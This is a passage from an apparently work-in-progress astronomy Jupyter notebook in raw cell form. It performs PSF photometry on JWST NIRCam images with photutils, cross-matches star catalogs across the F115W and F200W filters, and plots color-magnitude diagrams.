"## Work in Progress - Build a grid of effective PSF\n\nTwo functions:\n* count PSF stars in the grid \n* create a gridded ePSF\n\nThe purpose of the first function is to count how many good PSF stars are in each sub-region defined by the grid number N. The function should start from the number provided by the user and iterate until the minimum grid size 2x2. Depending on the number of PSF stars that the users want in each cell of the grid, they can choose the appropriate grid size or modify the threshold values for the stars detection, selected when creating the single ePSF (in the **Finding stars** cell above).\n\nThe second function creates a grid of PSFs with EPSFBuilder. The function will return a a GriddedEPSFModel object containing a 3D array of N × n × n. The 3D array represents the N number of 2D n × n ePSFs created. It should include a grid_xypos key which will state the position of the PSF on the detector for each of the PSFs. The order of the tuples in grid_xypos refers to the number the PSF is in the 3D array.",
"_____no_output_____"
],
[
"### I. Counting PSF stars in each region of the grid",
"_____no_output_____"
]
],
[
[
"def count_PSFstars_grid(grid_points=5, size=15, min_numpsf=40):\n\n num_grid_calc = np.arange(2, grid_points + 1, 1)\n num_grid_calc = num_grid_calc[::-1]\n\n for num in num_grid_calc:\n print(\"Calculating the number of PSF stars in a %d x %d grid:\" % (num, num))\n print(\"\")\n\n image = fits.open(dict_images[det][filt]['images'][i])\n data_sb = image[1].data\n\n points = np.int16((data_sb.shape[0] / num) / 2)\n x_center = np.arange(points, 2 * points * (num), 2 * points)\n y_center = np.arange(points, 2 * points * (num), 2 * points)\n\n centers = np.array(np.meshgrid(x_center, y_center)).T.reshape(-1, 2)\n\n for n, val in enumerate(centers):\n\n x = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['xcentroid']\n y = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['ycentroid']\n flux = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['flux']\n\n half_size = (size - 1) / 2\n\n lim1 = val[0] - points + half_size\n lim2 = val[0] + points - half_size\n lim3 = val[1] - points + half_size\n lim4 = val[1] + points - half_size\n\n test = (x > lim1) & (x < lim2) & (y > lim3) & (y < lim4)\n\n # if np.count_nonzero(test) < min_numpsf:\n # raise ValueError(\"Not enough PSF stars in all the cells (> %d): Decrease your grid size or the minimum number of PSF stars in each cell or change parameters in the finder\" %(min_numpsf))\n if np.count_nonzero(test) < min_numpsf:\n print(\"Center Coordinates of grid cell %d are (%d, %d) --- Not enough PSF stars in the cell (number of PSF stars < %d)\" % (i + 1, val[0], val[1], min_numpsf))\n\n else:\n print(\"Center Coordinate of grid cell %d are (%d, %d) --- Number of PSF stars:\" % (n + 1, val[0], val[1]), np.count_nonzero(test)) \n print(\"\")",
"_____no_output_____"
],
[
"for det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n print(\"Analyzing image {number} of filter {f}, detector {d} \".format(number=i + 1, f=filt, d=det))\n print(\"\")\n\n count_PSFstars_grid(grid_points=5, size=15, min_numpsf=40)",
"_____no_output_____"
]
],
[
[
"## TODO - Create a grid of ePSF",
"_____no_output_____"
],
[
"Here goes the function that creates a grid of ePSF that can be saved in the epsf dictionary.",
"_____no_output_____"
],
[
"## TODO - Use the ePSF grid to perturbate the WebbPSF model",
"_____no_output_____"
],
[
"Here goes the function that create a grid of PSF models obtained perturbating the WebbPSF PSF models using the ePSF grid created above.",
"_____no_output_____"
],
[
"## Perform PSF photometry\n\nWe perform the PSF photometry on the images, saving by default the output catalogs and the residual images in the dictionary created below. It is also possible to save the output catalogs (pickles pandas object) and residual images (fits files) in the current directory using the parameters `save_output` and `save_residuals`. ",
"_____no_output_____"
]
],
[
[
"dict_phot = {}\n\nfor det in dets_short:\n dict_phot.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n dict_phot[det].setdefault(filt, {})\n\n dict_phot[det][filt]['residual images'] = {}\n dict_phot[det][filt]['output photometry tables'] = {}\n\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n dict_phot[det][filt]['residual images'][i + 1] = None\n dict_phot[det][filt]['output photometry tables'][i + 1] = None",
"_____no_output_____"
]
],
[
[
"**Note**: since performing the PSF photometry on the images takes some time (for the 8 images in this example ~ 4 hours), to speed up the notebook, we use a high threshold in the finding algorithm (threshold ~ 2000) and we will use in the analyis below the catalogs obtained with a sigma threshold = 10 from a previous reduction run. To perform a meaningful data reduction, the user should modify the threshold accordingly. \n\nHere we use as PSF model the grid of WebbPSF PSFs, but the users can change the model and use the others available (i.e., single WebbPSF PSF, single ePSF) modifying the `psf` parameter in the function.",
"_____no_output_____"
]
],
[
[
"def psf_phot(det='NRCA1', filt='F070W', th=2000, psf='grid_webbpsf', save_residuals=False, save_output=False):\n\n bkgrms = MADStdBackgroundRMS()\n mmm_bkg = MMMBackground()\n fitter = LevMarLSQFitter()\n\n im = fits.open(dict_images[det][filt]['images'][i])\n imh = im[1].header\n data_sb = im[1].data\n\n d = im[0].header['DETECTOR']\n prim_dith_pos = im[0].header['PATT_NUM']\n prim_dith_num = im[0].header['NUMDTHPT']\n subpx_dith_pos = im[0].header['SUBPXNUM']\n subpx_dith_num = im[0].header['SUBPXPNS']\n\n data = data_sb / imh['PHOTMJSR']\n\n print(\"Conversion factor from {units} to DN/s for filter {f}:\".format(units=imh['BUNIT'], f=filt), imh['PHOTMJSR'])\n print(\"Applying conversion to the data\")\n \n sigma_psf = dict_utils[filt]['psf fwhm']\n print(\"FWHM for the filter {f}:\".format(f=filt), sigma_psf)\n \n std = bkgrms(data)\n bkg = mmm_bkg(data)\n \n daofind = DAOStarFinder(threshold=th * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n \n daogroup = DAOGroup(5.0 * sigma_psf)\n \n # grid PSF\n\n if psf == 'grid_webbpsf':\n print(\"Using as PSF model WebbPSF PSFs grid\")\n psf_model = dict_psfs_webbpsf[det][filt]['psf model grid'].copy()\n\n # single psf:\n\n if psf == 'single_webbpsf':\n print(\"Using as PSF model WebbPSF single PSF\")\n psf_model = dict_psfs_webbpsf[det][filt]['psf model single'].copy()\n\n # epsf:\n\n if psf == 'single_epsf':\n print(\"Using as PSF model single ePSF\")\n psf_model = dict_psfs_epsf[det][filt]['epsf single'][i + 1].copy()\n\n print(\"Performing the photometry on image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n \n tic = time.perf_counter()\n \n phot = IterativelySubtractedPSFPhotometry(finder=daofind, group_maker=daogroup,\n bkg_estimator=mmm_bkg, psf_model=psf_model,\n fitter=LevMarLSQFitter(),\n niters=2, fitshape=(11, 11), aperture_radius=ap_radius[j])\n result = phot(data)\n \n toc = time.perf_counter()\n \n print(\"Time needed to perform photometry on image {number}:\".format(number=i + 1), \"%.2f\" % ((toc - tic) / 3600), \"hours\")\n print(\"Number of sources detected in image {number} for filter {f}:\".format(number=i + 1, f=filt), len(result))\n \n residual_image = phot.get_residual_image()\n \n dict_phot[det][filt]['residual images'][i + 1] = residual_image\n dict_phot[det][filt]['output photometry tables'][i + 1] = result\n\n # save the residual images as fits file:\n\n if save_residuals:\n hdu = fits.PrimaryHDU(residual_image)\n hdul = fits.HDUList([hdu])\n residual_outname = 'residual_%s_%s_webbPSF_gridPSF_%dof%d_%dof%d.fits' % (d, filt, prim_dith_pos, prim_dith_num, subpx_dith_pos, subpx_dith_num)\n\n dir_output_phot = './'\n\n hdul.writeto(os.path.join(dir_output_phot, residual_outname))\n\n outname = 'phot_%s_%s_webbPSF_gridPSF_level2_%dof%d_%dof%d.pkl' % (d, filt, prim_dith_pos, prim_dith_num, subpx_dith_pos, subpx_dith_num)\n\n # save the output photometry Tables\n\n if save_output:\n tab = result.to_pandas()\n tab.to_pickle(os.path.join(dir_output_phot, outname))",
"_____no_output_____"
],
[
"tic_tot = time.perf_counter()\n\nap_radius = [3.0, 3.5] # must match the number of filters analyzed\n\nif glob.glob('./*residual*.fits'):\n print(\"Deleting Residual images from directory\")\n files = glob.glob('./residual*.fits')\n for file in files:\n os.remove(file)\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n \n psf_phot(det=det, filt=filt, th=2000, psf='grid_webbpsf', save_residuals=True, save_output=False) \n\ntoc_tot = time.perf_counter()\nprint(\"Time elapsed to perform the photometry of the {number} images:\".format(number=(len(filts_short) * len(dict_images[det][filt]['images']))), \"%.2f\" % ((toc_tot - tic_tot) / 3600), \"hours\") ",
"_____no_output_____"
]
],
[
[
"## Output Photometry Table\n\n\n### Note for developer: \n\nIt would be really useful, if PhotUtils can provide some diagnostics to identify the quality of the photometry in the final catalog for each source (similarly to all the other PSF photometry programs available).",
"_____no_output_____"
]
],
[
[
"dict_phot['NRCB1']['F115W']['output photometry tables'][1]",
"_____no_output_____"
]
],
[
[
"## Display subtracted image\n\nAs an example, we show the comparison between one science image and the residual image after the data reduction for both filters. Note that the residual image is obtained from the photometry run in the cell above with a very high detection threshold.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n image = fits.open(dict_images[det][filt]['images'][0])\n data_sb = image[1].data\n\n ax = plt.subplot(2, len(filts_short), i + 1)\n\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n plt.title(filt, fontdict=font2)\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n\n ax.imshow(data_sb, norm=norm, cmap='Greys')\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n res = dict_phot[det][filt]['residual images'][1]\n\n ax = plt.subplot(2, len(filts_short), i + 3)\n\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n\n ax.imshow(res, norm=norm, cmap='Greys')\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Part II - Data Analysis",
"_____no_output_____"
],
[
"**Note**: here we use the reduction obtained using a grid of WebbPSF PSFs as PSF models. The users can perform the data analysis using different PSF models (single PSF model, PSF grid, etc.) and compare the results. ",
"_____no_output_____"
],
[
"## Load Tables with PSF Photometry",
"_____no_output_____"
]
],
[
[
"if not glob.glob('./*phot*gridPSF*.pkl'):\n\n print(\"Downloading Photometry Output\")\n\n boxlink_cat_f115w = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/phot_cat_F115W.tar.gz'\n boxfile_cat_f115w = './phot_cat_F115W.tar.gz'\n urllib.request.urlretrieve(boxlink_cat_f115w, boxfile_cat_f115w)\n\n tar = tarfile.open(boxfile_cat_f115w, 'r')\n tar.extractall()\n\n boxlink_cat_f200w = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/phot_cat_F200W.tar.gz'\n boxfile_cat_f200w = './phot_cat_F200W.tar.gz'\n urllib.request.urlretrieve(boxlink_cat_f200w, boxfile_cat_f200w)\n\n tar = tarfile.open(boxfile_cat_f200w, 'r')\n tar.extractall()\n\n cat_dir = './'\n phots_pkl_f115w = sorted(glob.glob(os.path.join(cat_dir, '*F115W*gridPSF*.pkl')))\n phots_pkl_f200w = sorted(glob.glob(os.path.join(cat_dir, '*F200W*gridPSF*.pkl'))) \n\nelse:\n\n cat_dir = './'\n phots_pkl_f115w = sorted(glob.glob(os.path.join(cat_dir, '*F115W*gridPSF*.pkl')))\n phots_pkl_f200w = sorted(glob.glob(os.path.join(cat_dir, '*F200W*gridPSF*.pkl'))) \n\nresults_f115w = []\nresults_f200w = []\n\nfor phot_pkl_f115w, phot_pkl_f200w in zip(phots_pkl_f115w, phots_pkl_f200w):\n\n ph_f115w = pd.read_pickle(phot_pkl_f115w)\n ph_f200w = pd.read_pickle(phot_pkl_f200w)\n\n result_f115w = QTable.from_pandas(ph_f115w)\n result_f200w = QTable.from_pandas(ph_f200w)\n\n results_f115w.append(result_f115w)\n results_f200w.append(result_f200w)",
"_____no_output_____"
]
],
[
[
"## Transform the images to DataModel\n\nIn order to assign the WCS coordinate and hence cross-match the images, we need to transform the images to DataModel. The coordinates are assigned during the step [assign_wcs](https://jwst-pipeline.readthedocs.io/en/stable/jwst/assign_wcs/main.html?#using-the-wcs-interactively) step in the JWST pipeline and allow us to cross-match the different catalogs obtained for each filter.",
"_____no_output_____"
]
],
[
[
"images_f115w = []\nimages_f200w = []\n\nfor i in np.arange(0, len(dict_images['NRCB1']['F115W']['images']), 1):\n\n image_f115w = ImageModel(dict_images['NRCB1']['F115W']['images'][i])\n images_f115w.append(image_f115w)\n \nfor i in np.arange(0, len(dict_images['NRCB1']['F200W']['images']), 1):\n\n image_f200w = ImageModel(dict_images['NRCB1']['F200W']['images'][i])\n images_f200w.append(image_f200w)",
"_____no_output_____"
]
],
[
[
"## Cross-match the catalogs from the two filters for the 4 images\n\nWe cross-match the catalogs to obtain the single color-magnitude diagrams.\n\nStars from the two filters are associated if the distance between the matches is < 0.5 px. ",
"_____no_output_____"
]
],
[
[
"results_clean_f115w = []\nresults_clean_f200w = []\n\nfor i in np.arange(0, len(images_f115w), 1):\n\n mask_f115w = ((results_f115w[i]['x_fit'] > 0) & (results_f115w[i]['x_fit'] < 2048) &\n (results_f115w[i]['y_fit'] > 0) & (results_f115w[i]['y_fit'] < 2048) &\n (results_f115w[i]['flux_fit'] > 0))\n\n result_clean_f115w = results_f115w[i][mask_f115w]\n\n ra_f115w, dec_f115w = images_f115w[i].meta.wcs(result_clean_f115w['x_fit'], result_clean_f115w['y_fit'])\n radec_f115w = SkyCoord(ra_f115w, dec_f115w, unit='deg')\n result_clean_f115w['radec'] = radec_f115w\n results_clean_f115w.append(result_clean_f115w)\n\n mask_f200w = ((results_f200w[i]['x_fit'] > 0) & (results_f200w[i]['x_fit'] < 2048) &\n (results_f200w[i]['y_fit'] > 0) & (results_f200w[i]['y_fit'] < 2048) &\n (results_f200w[i]['flux_fit'] > 0))\n\n result_clean_f200w = results_f200w[i][mask_f200w]\n\n ra_f200w, dec_f200w = images_f200w[i].meta.wcs(result_clean_f200w['x_fit'], result_clean_f200w['y_fit'])\n radec_f200w = SkyCoord(ra_f200w, dec_f200w, unit='deg')\n\n result_clean_f200w['radec'] = radec_f200w\n results_clean_f200w.append(result_clean_f200w)",
"_____no_output_____"
],
[
"max_sep = 0.015 * u.arcsec\n\nmatches_phot_single = []\nfilt1 = 'F115W'\nfilt2 = 'F200W'\n\nfor res1, res2 in zip(results_clean_f115w, results_clean_f200w):\n\n idx, d2d, _ = match_coordinates_sky(res1['radec'], res2['radec'])\n\n sep_constraint = d2d < max_sep\n\n match_phot_single = Table()\n\n x_0_f115w = res1['x_0'][sep_constraint]\n y_0_f115w = res1['y_0'][sep_constraint]\n x_fit_f115w = res1['x_fit'][sep_constraint]\n y_fit_f115w = res1['y_fit'][sep_constraint]\n radec_f115w = res1['radec'][sep_constraint]\n mag_f115w = (-2.5 * np.log10(res1['flux_fit']))[sep_constraint]\n emag_f115w = (1.086 * (res1['flux_unc'] / res1['flux_fit']))[sep_constraint]\n\n x_0_f200w = res2['x_0'][idx[sep_constraint]]\n y_0_f200w = res2['y_0'][idx[sep_constraint]]\n x_fit_f200w = res2['x_fit'][idx[sep_constraint]]\n y_fit_f200w = res2['y_fit'][idx[sep_constraint]]\n radec_f200w = res2['radec'][idx][sep_constraint]\n mag_f200w = (-2.5 * np.log10(res2['flux_fit']))[idx[sep_constraint]]\n emag_f200w = (1.086 * (res2['flux_unc'] / res2['flux_fit']))[idx[sep_constraint]]\n\n match_phot_single['x_0_' + filt1] = x_0_f115w\n match_phot_single['y_0_' + filt1] = y_0_f115w\n match_phot_single['x_fit_' + filt1] = x_fit_f115w\n match_phot_single['y_fit_' + filt1] = y_fit_f115w\n match_phot_single['radec_' + filt1] = radec_f115w\n match_phot_single['mag_' + filt1] = mag_f115w\n match_phot_single['emag_' + filt1] = emag_f115w\n match_phot_single['x_0_' + filt2] = x_0_f200w\n match_phot_single['y_0_' + filt2] = y_0_f200w\n match_phot_single['x_fit_' + filt2] = x_fit_f200w\n match_phot_single['y_fit_' + filt2] = y_fit_f200w\n match_phot_single['radec_' + filt2] = radec_f200w\n match_phot_single['mag_' + filt2] = mag_f200w\n match_phot_single['emag_' + filt2] = emag_f200w\n\n matches_phot_single.append(match_phot_single) ",
"_____no_output_____"
]
],
[
[
"## Color-Magnitude Diagrams (Instrumental Magnitudes) for the 4 images",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 16))\nplt.clf()\n\nfor i in np.arange(0, len(matches_phot_single), 1):\n ax = plt.subplot(2, 2, i + 1)\n\n j = str(i + 1)\n\n xlim0 = -0.5\n xlim1 = 0.8\n ylim0 = -1\n ylim1 = -9\n\n ax.set_xlim(xlim0, xlim1)\n ax.set_ylim(ylim0, ylim1)\n\n ax.xaxis.set_major_locator(ticker.AutoLocator())\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_major_locator(ticker.AutoLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\n f115w_single = matches_phot_single[i]['mag_' + filt1]\n f200w_single = matches_phot_single[i]['mag_' + filt2]\n\n ax.scatter(f115w_single - f200w_single, f115w_single, s=1, color='k')\n\n ax.set_xlabel(filt1 + '-' + filt2, fontdict=font2)\n ax.set_ylabel(filt1, fontdict=font2)\n ax.text(xlim0 + 0.1, -8.65, \"Image %s\" % j, fontdict=font2)\n \nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Difference in retrieved positions (in pixels) between daofind an PSF routine\n\nWe show the difference in the stars position derived from daofind and the psf fitting algorithm. We also show the difference $\\Delta$X and $\\Delta$Y as a function of the instrumental magnitudes. ",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 6))\n\nax1 = plt.subplot(1, 2, 1)\n\nxlim0 = -1\nxlim1 = 1\nylim0 = -1\nylim1 = 1\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nx_find_f115w = results_clean_f115w[0]['x_0']\ny_find_f115w = results_clean_f115w[0]['y_0']\n\nx_psf_f115w = results_clean_f115w[0]['x_fit']\ny_psf_f115w = results_clean_f115w[0]['y_fit']\n\ndelta_x_f115w = x_find_f115w - x_psf_f115w\ndelta_y_f115w = y_find_f115w - y_psf_f115w\n\n_, d_x_f115w, sigma_d_x_f115w = sigma_clipped_stats(delta_x_f115w)\n_, d_y_f115w, sigma_d_y_f115w = sigma_clipped_stats(delta_y_f115w)\n\nax1.scatter(delta_x_f115w, delta_y_f115w, s=1, color='gray')\n\nax1.set_xlabel('$\\Delta$ X (px)', fontdict=font2)\nax1.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\nax1.set_title(filt1, fontdict=font2)\nax1.text(xlim0 + 0.05, ylim1 - 0.15, ' $\\Delta$ X = %5.3f $\\pm$ %5.3f' % (d_x_f115w, sigma_d_x_f115w),\n color='k', fontdict=font2)\nax1.text(xlim0 + 0.05, ylim1 - 0.30, ' $\\Delta$ Y = %5.3f $\\pm$ %5.3f' % (d_y_f115w, sigma_d_y_f115w),\n color='k', fontdict=font2)\nax1.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax1.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2 = plt.subplot(1, 2, 2)\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nx_find_f200w = results_clean_f200w[0]['x_0']\ny_find_f200w = results_clean_f200w[0]['y_0']\n\nx_psf_f200w = results_clean_f200w[0]['x_fit']\ny_psf_f200w = results_clean_f200w[0]['y_fit']\n\ndelta_x_f200w = x_find_f200w - x_psf_f200w\ndelta_y_f200w = y_find_f200w - y_psf_f200w\n\n_, d_x_f200w, sigma_d_x_f200w = sigma_clipped_stats(delta_x_f200w)\n_, d_y_f200w, sigma_d_y_f200w = sigma_clipped_stats(delta_y_f200w)\n\nax2.scatter(delta_x_f200w, delta_y_f200w, s=1, color='gray')\nax2.text(xlim0 + 0.05, ylim1 - 0.15, ' $\\Delta$ X = %5.3f $\\pm$ %5.3f' % (d_x_f200w, sigma_d_x_f200w),\n color='k', fontdict=font2)\nax2.text(xlim0 + 0.05, ylim1 - 0.30, ' $\\Delta$ Y = %5.3f $\\pm$ %5.3f' % (d_y_f200w, sigma_d_y_f200w),\n color='k', fontdict=font2)\nax2.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax2.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2.set_xlabel('$\\Delta$ X (px)', fontdict=font2)\nax2.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\nax2.set_title(filt2, fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 8))\n\nax1 = plt.subplot(2, 2, 1)\n\nxlim0 = -9\nxlim1 = -1\nylim0 = -1\nylim1 = 1\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nmag_inst_f115w = -2.5 * np.log10(results_clean_f115w[0]['flux_fit'])\n\nax1.scatter(mag_inst_f115w, delta_x_f115w, s=1, color='gray')\nax1.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax1.set_xlabel(filt1 + '_inst', fontdict=font2)\nax1.set_ylabel('$\\Delta$ X (px)', fontdict=font2)\n\nax2 = plt.subplot(2, 2, 2)\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(mag_inst_f115w, delta_y_f115w, s=1, color='gray')\nax2.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax2.set_xlabel(filt1 + '_inst', fontdict=font2)\nax2.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\n\nax3 = plt.subplot(2, 2, 3)\n\nax3.set_xlim(xlim0, xlim1)\nax3.set_ylim(ylim0, ylim1)\n\nax3.xaxis.set_major_locator(ticker.AutoLocator())\nax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax3.yaxis.set_major_locator(ticker.AutoLocator())\nax3.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nmag_inst_f200w = -2.5 * np.log10(results_clean_f200w[0]['flux_fit'])\n\nax3.scatter(mag_inst_f200w, delta_x_f200w, s=1, color='gray')\nax3.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax3.set_xlabel(filt2 + '_inst', fontdict=font2)\nax3.set_ylabel('$\\Delta$ X (px)', fontdict=font2)\n\nax4 = plt.subplot(2, 2, 4)\n\nax4.set_xlim(xlim0, xlim1)\nax4.set_ylim(ylim0, ylim1)\n\nax4.xaxis.set_major_locator(ticker.AutoLocator())\nax4.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax4.yaxis.set_major_locator(ticker.AutoLocator())\nax4.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax4.scatter(mag_inst_f200w, delta_y_f200w, s=1, color='gray')\nax4.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax4.set_xlabel(filt2 + '_inst', fontdict=font2)\nax4.set_ylabel('$\\Delta$ Y (px)', fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Cross-match the 4 catalogs for each filter\n\nTo obtain a final color-magnitude diagram, we need to cross-match all the catalogs for each filters and then cross-match the derived final catalogs.\n\n**Note**: this is the most conservative approach since we impose that a star must be found in all 4 catalogs.\n\n### Note for developer: \n\nI couldn't find an easier way to write this function, where you need to match the first two catalogs, derive a sub-catalogs with only the matches and then iterate for all the other catalogs available. We should also think on how to create a function that allows to keep the stars also if they are available in X out of Y catalogs (i.e., if for some reasons, a measure is not available in 1 of the images, but the star is well measured in the other 3, it doesn't make sense to discard the object).",
"_____no_output_____"
]
],
[
[
"def crossmatch_filter(table=None):\n\n num = 0\n num_cat = np.char.mod('%d', np.arange(1, len(table) + 1, 1))\n\n idx_12, d2d_12, _ = match_coordinates_sky(table[num]['radec'], table[num + 1]['radec'])\n\n sep_constraint_12 = d2d_12 < max_sep\n\n matches_12 = Table()\n\n matches_12['radec_' + num_cat[num]] = table[num]['radec'][sep_constraint_12]\n matches_12['mag_' + num_cat[num]] = (-2.5 * np.log10(table[num]['flux_fit']))[sep_constraint_12]\n matches_12['emag_' + num_cat[num]] = (1.086 * (table[num]['flux_unc'] / \n table[num]['flux_fit']))[sep_constraint_12]\n\n matches_12['radec_' + num_cat[num + 1]] = table[num + 1]['radec'][idx_12[sep_constraint_12]]\n matches_12['mag_' + num_cat[num + 1]] = (-2.5 * np.log10(table[num + 1]['flux_fit']))[idx_12[sep_constraint_12]]\n matches_12['emag_' + num_cat[num + 1]] = (1.086 * (table[num + 1]['flux_unc'] /\n table[num + 1]['flux_fit']))[idx_12[sep_constraint_12]]\n\n idx_123, d2d_123, _ = match_coordinates_sky(matches_12['radec_' + num_cat[num]], table[num + 2]['radec'])\n\n sep_constraint_123 = d2d_123 < max_sep\n\n matches_123 = Table()\n\n matches_123['radec_' + num_cat[num]] = matches_12['radec_' + num_cat[num]][sep_constraint_123]\n matches_123['mag_' + num_cat[num]] = matches_12['mag_' + num_cat[num]][sep_constraint_123]\n matches_123['emag_' + num_cat[num]] = matches_12['emag_' + num_cat[num]][sep_constraint_123]\n matches_123['radec_' + num_cat[num + 1]] = matches_12['radec_' + num_cat[num + 1]][sep_constraint_123]\n matches_123['mag_' + num_cat[num + 1]] = matches_12['mag_' + num_cat[num + 1]][sep_constraint_123]\n matches_123['emag_' + num_cat[num + 1]] = matches_12['emag_' + num_cat[num + 1]][sep_constraint_123]\n matches_123['radec_' + num_cat[num + 2]] = table[num + 2]['radec'][idx_123[sep_constraint_123]]\n matches_123['mag_' + num_cat[num + 2]] = (-2.5 * np.log10(table[num + 2]['flux_fit']))[idx_123[sep_constraint_123]]\n matches_123['emag_' + num_cat[num + 2]] = (1.086 * (table[num + 2]['flux_unc'] /\n table[num + 2]['flux_fit']))[idx_123[sep_constraint_123]]\n\n idx_1234, d2d_1234, _ = match_coordinates_sky(matches_123['radec_' + num_cat[num]], table[num + 3]['radec'])\n\n sep_constraint_1234 = d2d_1234 < max_sep\n\n matches_1234 = Table()\n\n matches_1234['radec_' + num_cat[num]] = matches_123['radec_' + num_cat[num]][sep_constraint_1234]\n matches_1234['mag_' + num_cat[num]] = matches_123['mag_' + num_cat[num]][sep_constraint_1234]\n matches_1234['emag_' + num_cat[num]] = matches_123['emag_' + num_cat[num]][sep_constraint_1234]\n matches_1234['radec_' + num_cat[num + 1]] = matches_123['radec_' + num_cat[num + 1]][sep_constraint_1234]\n matches_1234['mag_' + num_cat[num + 1]] = matches_123['mag_' + num_cat[num + 1]][sep_constraint_1234]\n matches_1234['emag_' + num_cat[num + 1]] = matches_123['emag_' + num_cat[num + 1]][sep_constraint_1234]\n matches_1234['radec_' + num_cat[num + 2]] = matches_123['radec_' + num_cat[num + 2]][sep_constraint_1234]\n matches_1234['mag_' + num_cat[num + 2]] = matches_123['mag_' + num_cat[num + 2]][sep_constraint_1234]\n matches_1234['emag_' + num_cat[num + 2]] = matches_123['emag_' + num_cat[num + 2]][sep_constraint_1234]\n matches_1234['radec_' + num_cat[num + 3]] = table[num + 3]['radec'][idx_1234[sep_constraint_1234]]\n matches_1234['mag_' + num_cat[num + 3]] = (-2.5 * np.log10(table[num + 3]['flux_fit']))[idx_1234[sep_constraint_1234]]\n matches_1234['emag_' + num_cat[num + 3]] = (1.086 * (table[num + 3]['flux_unc'] /\n table[num + 3]['flux_fit']))[idx_1234[sep_constraint_1234]]\n\n matches_1234\n\n return matches_1234",
"_____no_output_____"
],
[
"matches_f115w = crossmatch_filter(table=results_clean_f115w)\nmatches_f200w = crossmatch_filter(table=results_clean_f200w)",
"_____no_output_____"
]
],
[
[
"For the final catalog, we assume that the magnitude is the mean of the 4 measures and the error on the magnitude is its standard deviation.\n\nTo easily perform this arithmetic operation on the table, we convert the table to pandas dataframe.",
"_____no_output_____"
]
],
[
[
